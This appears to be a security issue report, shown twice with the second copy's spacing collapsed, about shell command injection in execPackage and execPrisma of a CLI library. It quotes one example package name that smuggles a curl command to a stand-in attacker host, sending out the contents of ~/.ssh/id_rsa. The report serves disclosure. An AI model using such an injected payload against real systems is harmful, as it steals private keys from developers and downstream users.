Description
execPackage and execPrisma build shell commands by concatenating strings and pass them to child_process.execSync (shell mode). If any caller passes user-influenced input (e.g., package names or prisma CLI args derived from CLI arguments, config files, or schema names), an attacker can inject arbitrary shell commands. For example, a crafted package name like "legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)" would execute the injected command. This is a library with downstream consumers, so the blast radius extends to all consumers who don't sanitize before calling these. The execPrisma path is particularly concerning since it's called with args that may originate from user-provided Prisma schema or CLI flags.
Severity: high
File: packages/cli/src/utils/exec-utils.ts
Expected Behavior
The code should handle this case properly to avoid unexpected errors or degraded quality.
Description
execPackageandexecPrismabuild shell commands by concatenating strings and pass them tochild_process.execSync(shell mode). If any caller passes user-influenced input (e.g., package names or prisma CLI args derived from CLI arguments, config files, or schema names), an attacker can inject arbitrary shell commands. For example, a crafted package name like"legit; curl attacker.com/exfil?d=$(cat ~/.ssh/id_rsa)"would execute the injected command. This is a library with downstream consumers, so the blast radius extends to all consumers who don't sanitize before calling these. TheexecPrismapath is particularly concerning since it's called withargsthat may originate from user-provided Prisma schema or CLI flags.Severity:
highFile:
packages/cli/src/utils/exec-utils.tsExpected Behavior
The code should handle this case properly to avoid unexpected errors or degraded quality.